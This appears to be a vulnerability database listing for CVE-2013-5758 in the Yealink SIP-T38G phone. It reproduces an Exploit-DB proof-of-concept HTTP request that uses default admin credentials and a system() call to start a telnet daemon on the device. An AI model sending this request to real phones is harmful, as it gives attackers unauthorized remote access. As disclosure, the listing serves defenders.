Yealink VoIP Phone SIP-T38G Remote Command Execution

vendor:

VoIP Phone SIP-T38G

by:

Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team

9,3

CVSS

HIGH

Remote Command Execution

CWE

Product Name: VoIP Phone SIP-T38G

Affected Version From: VoIP Phone SIP-T38G

Affected Version To: VoIP Phone SIP-T38G

Patch Exists: YES

Related CWE: CVE-2013-5758

CPE: h:yealink:sip-t38g

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2013

Yealink VoIP Phone SIP-T38G Remote Command Execution

Using cgiServer.exx we are able to send OS command using the system function.

Mitigation:

Ensure that the system is configured to use strong authentication and authorization mechanisms.

Source

Exploit-DB raw data:

Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758

Description:

Using cgiServer.exx we are able to send OS command using the system
function.

POC:

POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

system("/bin/busybox%20telnetd%20start")



-- 
*Mr.Un1k0d3r** or 1 #*